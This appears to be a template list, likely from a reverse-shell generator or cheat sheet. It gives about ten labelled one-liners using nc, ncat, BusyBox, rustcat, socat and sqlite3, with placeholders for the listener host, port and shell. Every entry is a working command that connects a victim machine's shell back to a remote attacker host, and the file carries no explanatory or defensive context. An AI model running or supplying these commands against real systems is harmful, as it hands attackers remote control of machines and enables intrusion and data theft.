(titulo) nc mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|(shell) -i 2>&1|nc (lhost) (lport) >/tmp/f

(titulo) nc -e
nc (lhost) (lport) -e (shell)

(titulo) BusyBox nc -e
busybox nc (lhost) (lport) -e (shell)

(titulo) nc -c
nc -c (shell) (lhost) (lport)

(titulo) ncat -e
ncat (lhost) (lport) -e (shell)

(titulo) ncat udp
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|(shell) -i 2>&1|ncat -u (lhost) (lport) >/tmp/f

(titulo) rustcat
rcat (lhost) (lport) -r (shell)

(titulo) socat #1
socat TCP:(lhost):(lport) EXEC:(shell)

(titulo) socat #2 (TTY)
socat TCP:(lhost):(lport) EXEC:'(shell)',pty,stderr,setsid,sigint,sane

(titulo) sqlite3 nc mkfifo
sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|(shell) -i 2>&1|nc (lhost) (lport) >/tmp/f'
